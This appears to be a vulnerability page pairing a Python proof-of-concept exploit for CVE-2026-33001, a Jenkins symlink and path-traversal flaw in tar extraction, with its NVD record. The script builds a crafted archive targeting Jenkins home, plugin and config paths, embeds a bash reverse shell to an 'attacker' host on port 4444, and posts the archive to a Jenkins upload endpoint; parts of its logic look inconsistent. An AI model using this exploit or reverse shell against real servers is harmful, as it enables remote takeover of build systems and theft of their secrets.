CVE-2026-33001

#!/usr/bin/env python3 # CVE-2026-33001 PoC - Jenkins Symbolic Link Arbitrary File Write # This PoC demonstrates creating a malicious tar archive with symbolic links import tarfile import os import io def create_malicious_tar(): """ Create a malicious tar archive containing symbolic links that can write files to arbitrary locations on Jenkins server """ # Create the malicious tar archive in memory tar_buffer = io.BytesIO() with tarfile.open(fileobj=tar_buffer, mode='w', format=tarfile.PAX_FORMAT) as tar: # Create a regular file that will be written via symlink malicious_content = b'#!/bin/bash\n# Malicious script injected via CVE-2026-33001\n# This could contain reverse shell or other malicious code\n/bin/bash -i >& /dev/tcp/attacker/4444 0>&1\n' info = tarfile.TarInfo(name='../../../../../../var/jenkins_home/userContent/malicious.sh') info.size = len(malicious_content) tar.addfile(info, io.BytesIO(malicious_content)) # Create symlink entry pointing to Jenkins plugin directory # This allows overwriting existing plugin files link_info = tarfile.TarInfo(name='plugin.txt') link_info.type = tarfile.SYMTYPE link_info.linkname = '../../../../../../var/jenkins_home/plugins/evilPlugin.jpi' tar.addfile(link_info) # Alternative: Symlink to overwrite config files config_link = tarfile.TarInfo(name='config.xml') config_link.type = tarfile.SYMTYPE config_link.linkname = '../../../../../../var/jenkins_home/config.xml' tar.addfile(config_link) return tar_buffer.getvalue() def exploit_jenkins(target_url, tar_data): """ Upload and extract malicious tar archive on Jenkins Requires Item/Configure permission or agent process control """ import requests # Upload the malicious archive upload_url = f"{target_url}/descriptorByName/hudson.tasks.Maven/installSource/upload" files = { 'upload': ('malicious.tar.gz', tar_data, 'application/x-gzip') } # Send the malicious archive response = requests.post(upload_url, files=files) return response.status_code == 200 if __name__ == '__main__': print("CVE-2026-33001 PoC - Jenkins Symbolic Link Attack") print("Target: Jenkins <= 2.554 or LTS <= 2.541.2") print("\nCreating malicious tar archive...") malicious_tar = create_malicious_tar() print(f"Generated tar archive: {len(malicious_tar)} bytes") # Save for manual testing with open('malicious_archive.tar.gz', 'wb') as f: f.write(malicious_tar) print("Archive saved as 'malicious_archive.tar.gz'") print("\nNote: This PoC is for educational and security research purposes only.")

{"cve": {"id": "CVE-2026-33001", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:28.067", "lastModified": "2026-03-20T18:08:15.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins 2.554 and earlier, LTS 2.541.2 and earlier does not safely handle symbolic links during the extraction of .tar and .tar.gz archives, allowing crafted archives to write files to arbitrary locations on the filesystem, restricted only by file system access permissions of the user running Jenkins.\nThis can be exploited to deploy malicious scripts or plugins on the controller by attackers with Item/Configure permission, or able to control agent processes."}, {"lang": "es", "value": "Jenkins 2.554 y anteriores, LTS 2.541.2 y anteriores no maneja de forma segura los enlaces simbólicos durante la extracción de archivos .tar y .tar.gz, permitiendo que archivos especialmente diseñados escriban archivos en ubicaciones arbitrarias del sistema de archivos, restringido únicamente por los permisos de acceso al sistema de archivos del usuario que ejecuta Jenkins. Esto puede ser explotado para desplegar scripts o plugins maliciosos en el controlador por atacantes con permiso de Elemento/Configurar, o capaces de controlar procesos de agente."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*", "versionEndExcluding": "2.541.3", "matchCriteriaId": "74E8B1F1-D28F-4BC1-B50C-F736D7FA12B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.555", "matchCriteriaId": "D1012DE2-C6E3-4BEA-BA8E-C83B07D8DD25"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2026-03-18/#SECURITY-3657", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}